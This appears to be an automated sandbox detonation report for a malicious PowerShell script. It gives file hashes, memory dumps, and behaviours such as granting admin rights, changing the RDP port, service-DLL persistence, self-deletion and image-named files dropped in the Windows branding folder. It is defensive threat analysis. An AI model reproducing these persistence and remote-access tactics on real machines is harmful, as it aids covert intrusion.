MD5 7d84d69cea5876aa4ea983b3c6b0ec7d
SHA1 a6d5955e05095b3aa7423278eebc7b0b10a8a1a1
SHA256 f57b8e47c256d8959d7a640b1f77b037b1556cf60ef5f9c75d75db39f9f78fdc
SHA512 302f3fef0863d07b747fdae8efec1e745aab1c96df0827158794e933955eceb427e3be2840f8adb8fd34d0fd5857aad7fb8418de29e4808e4f294e730d39d771

C:\Users\Admin\AppData\Local\Temp\bkor3f3f\bkor3f3f.dll

MD5 a6352d8fa7e61d649a585757b1a49440
SHA1 830458d7c451f84175c34968329861fd23c6ec8b
SHA256 fc10cb712fc4fd7312f580338e9f4cc5d10f9f06b1d9a085c872acb2f6fb8a9e
SHA512 90fde8555b16fd1f628eeeef1ea06cb6b11acff4efcd18abeaea1fdde3f58d96e20025f63c4f8246e95ad03d6e945be425614aa7f05bd0574b3816b1e61013f1

memory/1116-75-0x0000000002490000-0x0000000002491000-memory.dmp

memory/1116-76-0x000000001B590000-0x000000001B591000-memory.dmp

memory/1116-77-0x000000001B990000-0x000000001B991000-memory.dmp

memory/1116-78-0x000000001BA20000-0x000000001BA21000-memory.dmp

memory/528-79-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 104b5d12571a2cee16a7d67290b445c8
SHA1 489d3958106f3012563b14239747d06580a58e8f
SHA256 1192e7a86e92f69e22196ee3d37b181f6afd454b36c17ff7136d629ba537e55a
SHA512 208ab19c405be96539328929b46b21f8c19e2cd81e7b45a3bd894489d68143cdd7915ef4a5af4a302037772c2c089e4ce51ae4393880e896031bc2b6ac859a9c

memory/528-85-0x000000001AB74000-0x000000001AB76000-memory.dmp

memory/528-84-0x000000001AB70000-0x000000001AB72000-memory.dmp

memory/528-87-0x0000000002500000-0x0000000002501000-memory.dmp

memory/528-89-0x000000001B5A0000-0x000000001B5A1000-memory.dmp

memory/528-91-0x0000000002960000-0x0000000002961000-memory.dmp

memory/528-92-0x0000000002470000-0x0000000002471000-memory.dmp

memory/1116-93-0x000000001AB0A000-0x000000001AB29000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

MD5 13eb3fef37fde0d54de09cc371e04992
SHA1 5d33193883a59ff9ef78a9cb794fefb795769843
SHA256 2d5493a41beeaa831e62978faaede2826960e2bb773777b610b7d67a16434078
SHA512 48953fcf1fd0c6e83d1b435c30cdf4d262f08897f5b70c57582f23fa4984d6a5970e7da07776579219cdfabd70e5917b265e729adef1ca0bfd912b0c8d176f2d

memory/528-98-0x000000001B6E0000-0x000000001B6E1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_0f147aa2-0884-4f1c-867a-2006a6f30166

MD5 6f0d509e28be1af95ba237d4f43adab4
SHA1 c665febe79e435843553bee86a6cea731ce6c5e4
SHA256 f545be30e70cd6e1b70e98239219735f6b61c25712720bb1e1738f02be900e7e
SHA512 8dbadc140fd18eb16e2a282e3a0a895299b124850e7b9454a3f24e1cc1c090c5bebfbff5062e8807369e84ed7359e0854722cfd45b9a63681f9fea8c97fab797

memory/528-111-0x000000001B510000-0x000000001B511000-memory.dmp

memory/528-112-0x000000001B630000-0x000000001B631000-memory.dmp

memory/916-113-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 104b5d12571a2cee16a7d67290b445c8
SHA1 489d3958106f3012563b14239747d06580a58e8f
SHA256 1192e7a86e92f69e22196ee3d37b181f6afd454b36c17ff7136d629ba537e55a
SHA512 208ab19c405be96539328929b46b21f8c19e2cd81e7b45a3bd894489d68143cdd7915ef4a5af4a302037772c2c089e4ce51ae4393880e896031bc2b6ac859a9c

memory/916-119-0x00000000025F0000-0x00000000025F1000-memory.dmp

memory/916-121-0x000000001B600000-0x000000001B601000-memory.dmp

memory/916-122-0x00000000024F0000-0x00000000024F2000-memory.dmp

memory/916-124-0x00000000024F4000-0x00000000024F6000-memory.dmp

memory/916-125-0x0000000002870000-0x0000000002871000-memory.dmp

memory/916-126-0x0000000002430000-0x0000000002431000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

MD5 cfcaf8a6b89d22c1addac508c1a132eb
SHA1 a5e153b19a0d3f0b5f813b18b663587eb6108f8f
SHA256 e06497087a92e380087a8256637a4754d8be995686a71c8dd2adb99f362031a5
SHA512 c40e760cd89ffaa1d9c0f12d72a67b82e75ecbfe34596a8ba7aaa4eeb91ea65ba481ac3ca98aa337b18a1f2721cf760740ff0c78514a56c5e79b8b865332521c

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_0878cad9-bf04-42be-9efe-93e1eaa203aa

MD5 a70ee38af4bb2b5ed3eeb7cbd1a12fa3
SHA1 81dbaeae4b0f9e1adc0a1e3d6d76a12396498ba9
SHA256 dd2f41f92f19c3fe031bdf5da68ab06768e26762d0077b290cd0094df1d5d58d
SHA512 8c69a5300c7545c5c4b25a0594e6813b6b7a85b5f3ae7fc5464b4074fe6f50b2f49d31cacf19bc20a02bb8e237656f1b9b2a3f6a3953e3a8478ca2adc154e0e3

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_af714b83-3b1b-4e6b-a9e4-590e5c08e9ad

MD5 faa37917b36371249ac9fcf93317bf97
SHA1 a0f0d84d58ee518d33a69f5f1c343aa921c8ffd4
SHA256 b92f1a891dbe4152a1f834774cc83378d8b4cffb7e344a813219d74ec4084132
SHA512 614d3692e5be7554a72a38af408458254af271eaf6855f322ae07aaa647b1478c7ad13027285c8d9999db3739d65ac85ecfdf3e56acca8484083aa0e31de2198

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_0714e1ae-4953-48a8-a4ef-a64baf5f0b2f

MD5 2d5cd190b5db0620cd62e3cd6ba1dcd3
SHA1 ff4f229f4fbacccdf11d98c04ba756bda80aac7a
SHA256 ab9aee31b3411bcc5a5fb51e9375777cca79cfb3a532d93ddd98a5673c60571d
SHA512 edb2a46f3ee33b48f8fe0b548c1e7940978d0e4ac90d5090807d8b5c8b1320217e5d66990b1d0a85546acbbaf9b601590d35de87de234da8eafd60d12fdce610

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6113e00d-fd75-432e-a198-c6a96fa59fca

MD5 d89968acfbd0cd60b51df04860d99896
SHA1 b3c29916ccb81ce98f95bbf3aa8a73de16298b29
SHA256 1020cc7c929cd5a4e68ccb40353ca76f427df363f0d95e456eb79db039bdb2b9
SHA512 b0e886cce598371b59131fed1535e220c798691bad93ef9474ba440066f5a6bd77a60966604b7a5ff6298b2e200c9dd0c8f9f04aff208b2af423480ead4e8842

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_8c0877fb-0c41-4715-be23-0883ce845408

MD5 e5b3ba61c3cf07deda462c9b27eb4166
SHA1 b324dad73048be6e27467315f82b7a5c1438a1f9
SHA256 b84fae85b6203a0c8c9db3ba3c050c97d6700e5c9ae27dd31c103ec1bbb02925
SHA512 a5936a098db2e8c0d0231fd97d73cc996ad99897fd64f0e5c6761c44b8eb2db2bff477843d326503e6027c1113da0e8e35f4227195a3cf505c5a374ebe0f67fc

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_8517c3c3-4f73-4a29-b647-c9873fcdd631

MD5 7f79b990cb5ed648f9e583fe35527aa7
SHA1 71b177b48c8bd745ef02c2affad79ca222da7c33
SHA256 080ec69d3f2abac629a0bdc314f150ad42a9a1b0a031b1d5c7b5b80051c48683
SHA512 20926edf7f0b990da4bd8d7ba91bd8bf7b952b75080f687afa7197a91777604688303d38b4a0a7240b558c23f2e0cd927d3590765109f8be0551f5eb050eafda

memory/824-134-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 104b5d12571a2cee16a7d67290b445c8
SHA1 489d3958106f3012563b14239747d06580a58e8f
SHA256 1192e7a86e92f69e22196ee3d37b181f6afd454b36c17ff7136d629ba537e55a
SHA512 208ab19c405be96539328929b46b21f8c19e2cd81e7b45a3bd894489d68143cdd7915ef4a5af4a302037772c2c089e4ce51ae4393880e896031bc2b6ac859a9c

memory/824-140-0x000000001AB70000-0x000000001AB72000-memory.dmp

memory/824-141-0x000000001AB74000-0x000000001AB76000-memory.dmp

\??\PIPE\lsarpc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/1116-149-0x000000001C620000-0x000000001C621000-memory.dmp

memory/1672-150-0x0000000000000000-mapping.dmp

C:\Windows\system32\rfxvmt.dll

MD5 dc39d23e4c0e681fad7a3e1342a2843c
SHA1 58fd7d50c2dca464a128f5e0435d6f0515e62073
SHA256 6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA512 5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

memory/1636-152-0x0000000000000000-mapping.dmp

memory/952-153-0x0000000000000000-mapping.dmp

memory/1144-154-0x0000000000000000-mapping.dmp

memory/692-155-0x0000000000000000-mapping.dmp

memory/1516-156-0x0000000000000000-mapping.dmp

memory/576-157-0x0000000000000000-mapping.dmp

memory/1628-158-0x0000000000000000-mapping.dmp

memory/1496-159-0x0000000000000000-mapping.dmp

memory/1312-160-0x0000000000000000-mapping.dmp

memory/968-161-0x0000000000000000-mapping.dmp

memory/1860-162-0x0000000000000000-mapping.dmp

memory/1936-163-0x0000000000000000-mapping.dmp

memory/1572-164-0x0000000000000000-mapping.dmp

memory/1840-165-0x0000000000000000-mapping.dmp

memory/1920-166-0x0000000000000000-mapping.dmp

memory/2008-167-0x0000000000000000-mapping.dmp

memory/1160-168-0x0000000000000000-mapping.dmp

memory/1512-169-0x0000000000000000-mapping.dmp

memory/832-170-0x0000000000000000-mapping.dmp

memory/700-171-0x0000000000000000-mapping.dmp

\Windows\Branding\mediasrv.png

MD5 c13860727871a39063e0bb58117919ba
SHA1 4f91c6240d459858b7723e843d2ed37e1e9d152b
SHA256 8fa363bec94402d57a8c1acb288e9d9ca0a28eee18d300359e83252c60e01719
SHA512 348c5ecd6f06a114c11b100a95b89687a3064afe1fd5c3874772938a463c29d23938a1bca967734c19fd06bcf97f5d75c78431305912e06f1d73ceb83db48ec6

\Windows\Branding\mediasvc.png

MD5 aa6bf98c9120b0539c0270a3e453ddf6
SHA1 982bae56ad251639d34412d40bd7c0f2c2f4ff7a
SHA256 7ca008588561777420954419f28471ffc53dded26af0c640991ecf80de490d99
SHA512 d633dfa60bd26d516e4b659f66ca32deabf11ae5334ab3d187dd71d8137d56f92273af0a6abdc56b6af270d4821ab86ca5dacecb849e6151ffa929328ad0c74c

memory/1648-174-0x0000000000000000-mapping.dmp

memory/1336-175-0x0000000000000000-mapping.dmp

memory/1204-176-0x0000000000000000-mapping.dmp

memory/1600-177-0x0000000000000000-mapping.dmp

memory/2032-178-0x0000000000000000-mapping.dmp

memory/316-179-0x0000000000000000-mapping.dmp

memory/2024-180-0x0000000000000000-mapping.dmp

memory/1596-181-0x0000000000000000-mapping.dmp

memory/740-182-0x0000000000000000-mapping.dmp

memory/1296-183-0x0000000000000000-mapping.dmp

memory/1336-184-0x0000000000000000-mapping.dmp

memory/672-185-0x0000000000000000-mapping.dmp

memory/948-186-0x0000000000000000-mapping.dmp

memory/1840-187-0x0000000000000000-mapping.dmp

memory/1964-188-0x0000000000000000-mapping.dmp

memory/916-189-0x0000000000000000-mapping.dmp

memory/916-195-0x0000000019510000-0x0000000019512000-memory.dmp

memory/916-196-0x0000000019514000-0x0000000019516000-memory.dmp

memory/1336-197-0x0000000000000000-mapping.dmp

memory/672-198-0x0000000000000000-mapping.dmp

memory/916-227-0x000000001951A000-0x0000000019539000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2021-08-18 13:28

Reported

2021-08-18 13:33

Platform

win10v20210410

Max time kernel

19s

Max time network

114s

Command Line

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\b65273062c9be6bfc6343438e51d7f68aaecf8382ae1373ff1b3adfa~.ps1

Signatures

Grants admin privileges

Modifies RDP port number used by Windows

Sets DLL path for service in the registry

persistence

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\branding\wupsvc.jpg C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\Basebrd C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\mediasrv.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_21np3wcj.kgz.ps1 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\mediasrv.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\mediasvc.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI671C.tmp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI676D.tmp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\ShellBrd C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\mediasvc.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI673C.tmp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI674D.tmp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_c42vl31h.kva.psm1 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\wupsvc.jpg C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI677E.tmp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "My Computer [Protected Mode]" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1200 = "3" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1400 = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\DisplayName = "Local intranet" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZonesSecurityUpgrade = 339704ea112ed701 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\PMDisplayName = "Trusted sites [Protected Mode]" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "Computer [Protected Mode]" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\PMDisplayName = "Restricted sites [Protected Mode]" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Icon = "shell32.dll#0018" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Flags = "33" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\DisplayName = "Local intranet" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Icon = "inetcpl.cpl#00004481" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ftp = "3" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\LowIcon = "inetcpl.cpl#005422" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\57fd7ae31ab34c2c = 2c0053004f004600540057004100520045005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073005c0035002e0030005c00430061006300680065002c000000 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\CurrentLevel = "73728" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\PMDisplayName = "Local intranet [Protected Mode]" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1200 = "3" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "Computer" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Icon = "inetcpl.cpl#001313" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\ef29a4ec885fa451 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,User Agent," C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\DisplayName = "Trusted sites" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\DisplayName = "Restricted sites" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\LowIcon = "inetcpl.cpl#005426" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Description = "Your computer" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\DisplayName = "Internet" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1400 = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "Computer" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Flags = "33" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1200 = "3" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags = "3" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\DisplayName = "Trusted sites" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\LowIcon = "inetcpl.cpl#005425" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1200 = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
